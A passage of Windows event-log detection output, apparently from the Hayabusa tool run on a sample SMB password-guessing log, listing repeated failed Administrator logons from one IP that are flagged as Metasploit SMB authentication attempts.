Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 